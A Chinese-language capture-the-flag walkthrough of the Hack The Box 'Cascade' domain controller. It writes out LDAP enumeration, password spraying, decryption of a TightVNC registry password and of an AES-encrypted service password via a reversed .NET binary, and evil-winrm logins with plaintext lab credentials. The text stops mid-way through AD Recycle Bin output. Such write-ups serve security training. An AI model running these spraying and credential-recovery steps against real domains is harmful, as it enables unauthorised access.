#LDAP_anonymous_binds #sqlite #VNC #.NET #AD_Recycle_Bin #PasswordReuse
靶机开启后IP为:10.10.10.182
Nmap Scan
TCP协议全部端口
sudo nmap -p- --min-rate 2000 10.10.10.182 -vvv -oA Scan/ports
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
49154/tcp open unknown syn-ack ttl 127
49155/tcp open unknown syn-ack ttl 127
49157/tcp open unknown syn-ack ttl 127
49158/tcp open unknown syn-ack ttl 127
49170/tcp open unknown syn-ack ttl 127
grep open Scan/ports.nmap | cut -d / -f1 | paste -sd ','
53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170
ports=`grep open Scan/ports.nmap | cut -d / -f1 | paste -sd ','`
靶机开放了 88、389 等端口,确定是一台域主机。
默认脚本扫描开放端口
sudo nmap -sCV -O -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oA Scan/detail
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-07 14:39:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-07T14:40:40
|_ start_date: 2024-01-07T14:34:41
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.62 seconds
cascade.local 添加到 /etc/hosts 文件中。
LDAP Anonymous
SMB 没有凭据不能访问。
smbmap -H 10.10.10.182 -u 'Guest' -p ''
LDAP 可以匿名枚举。
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local'
asreproasting enum:
impacket-GetNPUsers -dc-ip 10.10.10.182 cascade.local/
kerberoasting enum:
impacket-GetUserSPNs -dc-ip 10.10.10.182 cascade.local/
PasswordSpray
枚举域中所有用户,使用 GetADUsers 比较方便可以看到上次登录时间。
impacket-GetADUsers -dc-ip 10.10.10.182 cascade.local/ -all
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying 10.10.10.182 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ----- ------------------- -------------------
CascGuest <never> <never>
arksvc 2020-01-09 11:18:20.217288 2020-01-29 16:05:40.988784
s.smith 2020-01-28 14:58:05.485736 2020-01-28 18:26:39.084234
r.thompson 2020-01-09 14:31:26.263625 2020-01-28 20:11:52.571323
util 2020-01-12 21:07:11.195585 2020-01-28 13:09:47.107123
j.wakefield 2020-01-09 15:34:44.415012 <never>
s.hickson 2020-01-12 20:24:27.800396 <never>
j.goodhand 2020-01-12 20:40:26.032079 <never>
a.turnbull 2020-01-12 20:43:13.357973 <never>
e.crowe 2020-01-12 22:45:02.166946 <never>
b.hanson 2020-01-13 11:35:39.153866 <never>
d.burman 2020-01-13 11:36:12.959125 <never>
BackupSvc 2020-01-13 11:37:03.191213 <never>
j.allen 2020-01-13 12:23:59.916560 <never>
i.croft 2020-01-15 16:46:21.865201 <never>
也可以使用 ldapsearch 查询上次登录时间大于 1 的用户。
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(&(objectcategory=user)(lastLogonTimestamp>=1))' > ldap_lastlogon_user.txt
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(objectcategory=user)' > ldap_user.txt
整理出所有用户,同样可以使用 crackmapexec、rpcclient、enum4linux
grep -i 'samaccountname' ldap_user.txt | awk -F': ' '{print $2}' > users.txt
grep -i 'samaccountname' ldap_lastlogon_user.txt | awk -F ': ' '{print $2}' > lastlogon_user.txt
查看密码策略,Account Lockout Threshold 为 NULL 不锁定密码,同时最小密码位数为 5。
crackmapexec smb 10.10.10.182 --pass-pol
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] Dumping password info for domain: CASCADE
SMB 10.10.10.182 445 CASC-DC1 Minimum password length: 5
SMB 10.10.10.182 445 CASC-DC1 Password history length: None
SMB 10.10.10.182 445 CASC-DC1 Maximum password age: Not Set
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Password Complexity Flags: 000000
SMB 10.10.10.182 445 CASC-DC1 Domain Refuse Password Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Store Cleartext: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Lockout Admins: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Clear Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password No Anon Change: 0
SMB 10.10.10.182 445 CASC-DC1 Domain Password Complex: 0
SMB 10.10.10.182 445 CASC-DC1
SMB 10.10.10.182 445 CASC-DC1 Minimum password age: None
SMB 10.10.10.182 445 CASC-DC1 Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Locked Account Duration: 30 minutes
SMB 10.10.10.182 445 CASC-DC1 Account Lockout Threshold: None
SMB 10.10.10.182 445 CASC-DC1 Forced Log off Time: Not Set
这里可以使用密码喷洒,但是都失败了。
kerbrute passwordspray -d cascade.local --dc cascade.local users.txt --user-as-pass
crackmapexec ldap 10.10.10.182 -u '' -p '' -d cascade.local
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.182 445 CASC-DC1 [-] cascade.local\: Error connecting to the domain, are you sure LDAP service is running on the target ?
crackmapexec smb 10.10.10.182 -u lastlogon_user.txt -p lastlogon_user.txt --continue-on-success
Legacy
使用用户名做密码爆破都失败了,目前唯一可利用的点还是在 ldap,再看一遍 ldapsearch 枚举到的信息。
ldapsearch -x -H ldap://10.10.10.182 -b 'dc=cascade,dc=local' '(objectcategory=user)'
userPrincipalName: r.thompson@cascade.local
cascadeLegacyPwd: clk0bjVldmE=
在用户 r.thompson 这里发现了与其他人不同的信息。
Legacy Password Google translate 旧密码
echo clk0bjVldmE= | base64 -d
rY4n5eva
再尝试密码喷洒:
crackmapexec smb 10.10.10.182 -u lastlogon_user.txt -p rY4n5eva --continue-on-success
kerbrute passwordspray -d cascade.local --dc cascade.local users.txt rY4n5eva
r.thompson 用户没有及时修改旧密码。
r.thompson 用户属于 IT 组,但不是 Remote Management Users 组成员无法通过 winrm 远程。
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
SMB
根据开放端口,得到的凭据只能用于查看 SMB。
crackmapexec smb 10.10.10.182 -u r.thompson -p rY4n5eva --shares
SMB 10.10.10.182 445 CASC-DC1 [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.10.10.182 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.10.10.182 445 CASC-DC1 [+] Enumerated shares
SMB 10.10.10.182 445 CASC-DC1 Share Permissions Remark
SMB 10.10.10.182 445 CASC-DC1 ----- ----------- ------
SMB 10.10.10.182 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.10.10.182 445 CASC-DC1 Audit$
SMB 10.10.10.182 445 CASC-DC1 C$ Default share
SMB 10.10.10.182 445 CASC-DC1 Data READ
SMB 10.10.10.182 445 CASC-DC1 IPC$ Remote IPC
SMB 10.10.10.182 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.10.10.182 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.10.10.182 445 CASC-DC1 SYSVOL READ Logon server share
Data
查看不是常规目录的 Data
smbclient -U 'r.thompson%rY4n5eva' //10.10.10.182/Data
Try "help" to get a list of possible commands.
6553343 blocks of size 4096. 1625204 blocks available
smb: \> recurse
smb: \> dir
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
# 选出要下载的文件
\IT\Email Archives
. D 0 Tue Jan 28 13:00:30 2020
.. D 0 Tue Jan 28 13:00:30 2020
Meeting_Notes_June_2018.html An 2522 Tue Jan 28 13:00:12 2020
\IT\Logs
. D 0 Tue Jan 28 19:53:04 2020
.. D 0 Tue Jan 28 19:53:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 11:33:45 2020
DCs D 0 Tue Jan 28 19:56:00 2020
\IT\Logs\Ark AD Recycle Bin
. D 0 Fri Jan 10 11:33:45 2020
.. D 0 Fri Jan 10 11:33:45 2020
ArkAdRecycleBin.log A 1303 Tue Jan 28 20:19:11 2020
\IT\Logs\DCs
. D 0 Tue Jan 28 19:56:00 2020
.. D 0 Tue Jan 28 19:56:00 2020
dcdiag.log A 5967 Fri Jan 10 11:17:30 2020
\IT\Temp\s.smith
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
将上述文件都下载到本地查看。
file
- Meeting_Notes_June_2018.html
From: Steve Smith
To: IT (Internal)
Sent: 14 June 2018 14:07
Subject: Meeting Notes
For anyone that missed yesterday’s meeting (I’m looking at you Ben). Main points are below:
-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.
Stev
Username is TempAdmin (password is the same as the normal admin account password).
用户
TempAdmin密码与管理员密码相同,但是该用户已被删除。
- VNC Install.reg
注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""
其中有密码
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
Decrypt
Google Decrypting a Hex code from VNC install Registry OR VNC password decrypt
frizb/PasswordDecrypts: Handy Stored Password Decryption Techniques
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
6bcf2a4b6e5aca0f
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
sT333ve2
openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
验证是 s.smith 用户的密码。
kerbrute passwordspray -d cascade.local --dc cascade.local lastlogon_user.txt sT333ve2
Initial Access
Audit
evil-winrm -i cascade.local -u s.smith -p sT333ve2
smbclient -U 's.smith%sT333ve2' //10.10.10.182/Audit$
smb: \> recurse
smb: \> dir
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
\DB
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
...
smb: \> cd db
smb: \db\> dir
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1624946 blocks available
smb: \db\> prompt
smb: \db\> get Audit.db
getting file \db\Audit.db of size 24576 as Audit.db (39.3 KiloBytes/sec) (average 39.3 KiloBytes/sec)
在靶机上查看:
net use '\\localhost\Audit$'
The command completed successfully.
# 查看 acl 是在想是否存在 dll 劫持的可能,但利用也需要计划任务执行该软件
icacls '\\localhost\Audit$'
\\localhost\Audit$ CASCADE\Audit Share:(OI)(CI)(RX)
CREATOR OWNER:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
查看目录下文件
dir '\\localhost\Audit$'
Directory: \\localhost\Audit$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/28/2020 9:40 PM DB
d----- 1/26/2020 10:25 PM x64
d----- 1/26/2020 10:25 PM x86
-a---- 1/28/2020 9:46 PM 13312 CascAudit.exe
-a---- 1/29/2020 6:00 PM 12288 CascCrypto.dll
-a---- 1/28/2020 11:29 PM 45 RunAudit.bat
-a---- 10/27/2019 6:38 AM 363520 System.Data.SQLite.dll
-a---- 10/27/2019 6:38 AM 186880 System.Data.SQLite.EF6.dll
查看 RunAudit.bat,内容是执行 CascAudit.exe ,同时参数是 Audit.db。
type '\\localhost\Audit$\RunAudit.bat'
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
DB
Audit.db 数据库文件可能包含密码,优先级最高,将其下载到本地,看目录其他文件包含 sqlite3,所以使用 sqlite3 打开
sqlite3 Audit.db
SQLite version 3.44.0 2023-11-01 11:23:50
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit Ldap Misc
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Ldap" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"uname" TEXT,
"pwd" TEXT,
"domain" TEXT
);
INSERT INTO Ldap VALUES(1,'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw==','cascade.local');
CREATE TABLE IF NOT EXISTS "Misc" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Ext1" TEXT,
"Ext2" TEXT
);
CREATE TABLE IF NOT EXISTS "DeletedUserAudit" (
"Id" INTEGER PRIMARY KEY AUTOINCREMENT,
"Username" TEXT,
"Name" TEXT,
"DistinguishedName" TEXT
);
INSERT INTO DeletedUserAudit VALUES(6,'test',replace('Test\nDEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d','\n',char(10)),'CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(7,'deleted',replace('deleted guy\nDEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef','\n',char(10)),'CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local');
INSERT INTO DeletedUserAudit VALUES(9,'TempAdmin',replace('TempAdmin\nDEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a','\n',char(10)),'CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local');
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Ldap',2);
INSERT INTO sqlite_sequence VALUES('DeletedUserAudit',10);
COMMIT;
提取用户名密码
'ArkSvc','BQO5l5Kj9MdErXx6Q6AGOw=='
base64 解码失败,直接尝试作为密码登录同样失败。
crackmapexec smb 10.10.10.182 -u 'ArkSvc' -p 'BQO5l5Kj9MdErXx6Q6AGOw=='
Decrypt
bat 文件的内容是执行 CascAudit.exe,那解密的关键很可能在该文件,将 CascAudit.exe 和 CascCrypto.dll download 到本地,放入 dnspy 中查看:
点击 MainModule 可以看到解密函数,
string encryptedString = Conversions.ToString(sqliteDataReader["Pwd"]);
try
{
password = Crypto.DecryptString(encryptedString, "c4scadek3y654321");
}
左键点击函数名跳转到函数位置,如下图:
红框处详细的列出了 AES 加密的 IV、Mode、KeySize,key 值就是上一个函数的参数值,很简单的逆向,得到了想要的值。
public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
string @string;
using (MemoryStream memoryStream = new MemoryStream(array))
{
using (CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
@string = Encoding.UTF8.GetString(array2);
}
}
return @string;
}
// Token: 0x04000006 RID: 6
public const string DefaultIV = "1tdyjCbY1Ix49842";
// Token: 0x04000007 RID: 7
public const int Keysize = 128;
}
string = BQO5l5Kj9MdErXx6Q6AGOw==
IV = "1tdyjCbY1Ix49842"
key = "c4scadek3y654321"
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
Google aes decrypt
# AES Decrypted Output **(Base64)**:
dzNsYzBtZUZyMzFuZA==
Plain Text:
w3lc0meFr31nd
验证:
crackmapexec smb 10.10.10.182 -u 'ArkSvc' -p 'w3lc0meFr31nd'
evil-winrm -i cascade.local -u 'ArkSvc' -p 'w3lc0meFr31nd'
AD Recycle Bin
查看用户属于 AD Recycle Bin 组。
net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 4:18:20 PM
Password expires Never
Password changeable 1/9/2020 4:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/8/2024 6:55:12 AM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
Google AD Recycle Bin Privilege Escalation
Domain Privilege Escalation - Offsec Journey
This group gives you permission to read deleted AD object. Something juicy information can be found in there:
The Active Directory Recycle Bin is used to recover deleted Active Directory objects such as Users, Groups, OUs etc. The objects keep all their properties intact while in the AD Recycle Bin, which allows them to be restored at any point.
Get-ADObject
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
CanonicalName : cascade.local/Deleted Objects
CN : Deleted Objects
Created : 1/9/2020 3:31:39 PM
createTimeStamp : 1/9/2020 3:31:39 PM
Deleted : True
Description : Default container for deleted objects
DisplayName :
DistinguishedName : CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isCriticalSystemObject : True
isDeleted : True
LastKnownParent :
Modified : 1/13/2020 1:21:17 AM
modifyTimeStamp : 1/13/2020 1:21:17 AM
Name : Deleted Objects
ObjectCategory : CN=Container,CN=Schema,CN=Configuration,DC=cascade,DC=local
ObjectClass : container
ObjectGUID : 51de9801-3625-4ac2-a605-d6bd71617681
ProtectedFromAccidentalDeletion :
sDRightsEffective : 0
showInAdvancedViewOnly : True
systemFlags : -1946157056
uSNChanged : 65585
uSNCreated : 5695
whenChanged : 1/13/2020 1:21:17 AM
whenCreated : 1/9/2020 3:31:39 PM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage : 0
countryCode : 0
Created : 1/9/2020 7:30:19 PM
createTimeStamp : 1/9/2020 7:30:19 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType : 4
isCriticalSystemObject : False
isDeleted : True
LastKnownParent : OU=Computers,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
localPolicyFlags : 0
logonCount : 0
Modified : 1/28/2020 6:08:35 PM
modifyTimeStamp : 1/28/2020 6:08:35 PM
msDS-LastKnownRDN : CASC-WS1
Name : CASC-WS1
DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : computer
ObjectGUID : 6d97daa4-2e82-4946-a11e-f91fa18bfabe
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1108
primaryGroupID : 515
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132230718192147073
sAMAccountName : CASC-WS1$
sDRightsEffective : 0
userAccountControl : 4128
uSNChanged : 245849
uSNCreated : 24603
whenChanged : 1/28/2020 6:08:35 PM
whenCreated : 1/9/2020 7:30:19 PM
CanonicalName : cascade.local/Deleted Objects/Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
CN : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
Created : 1/13/2020 5:21:53 PM
createTimeStamp : 1/13/2020 5:21:53 PM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Scheduled Tasks\0ADEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/17/2020 9:35:46 PM, 1/17/2020 9:32:57 PM, 1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM...}
groupType : -2147483644
instanceType : 4
isDeleted : True
LastKnownParent : OU=Groups,OU=UK,DC=cascade,DC=local
Modified : 1/28/2020 6:07:55 PM
modifyTimeStamp : 1/28/2020 6:07:55 PM
msDS-LastKnownRDN : Scheduled Tasks
Name : Scheduled Tasks
DEL:13375728-5ddb-4137-b8b8-b9041d1d3fd2
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : group
ObjectGUID : 13375728-5ddb-4137-b8b8-b9041d1d3fd2
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1131
ProtectedFromAccidentalDeletion : False
sAMAccountName : Scheduled Tasks
sDRightsEffective : 0
uSNChanged : 245848
uSNCreated : 114790
whenChanged : 1/28/2020 6:07:55 PM
whenCreated : 1/13/2020 5:21:53 PM
CanonicalName : cascade.local/Deleted Objects/{A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
CN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
Created : 1/26/2020 2:34:30 AM
createTimeStamp : 1/26/2020 2:34:30 AM
Deleted : True
Description :
DisplayName : Block Potato
DistinguishedName : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
flags : 0
gPCFileSysPath : \\cascade.local\SysVol\cascade.local\Policies\{A403B701-A528-4685-A816-FDEE32BDDCBA}
gPCFunctionalityVersion : 2
gPCMachineExtensionNames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1D-2488-11D1-A28C-00C04FB94F17}]
instanceType : 4
isDeleted : True
LastKnownParent : CN=Policies,CN=System,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : {A403B701-A528-4685-A816-FDEE32BDDCBA}
Name : {A403B701-A528-4685-A816-FDEE32BDDCBA}
DEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : groupPolicyContainer
ObjectGUID : ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196701
uSNCreated : 196688
versionNumber : 2
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:30 AM
CanonicalName : cascade.local/Deleted Objects/Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
CN : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=Machine\0ADEL:93c23674-e411-400b-bb9f-c0340bda5a34,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : Machine
Name : Machine
DEL:93c23674-e411-400b-bb9f-c0340bda5a34
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 93c23674-e411-400b-bb9f-c0340bda5a34
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196699
uSNCreated : 196689
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
CanonicalName : cascade.local/Deleted Objects/User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
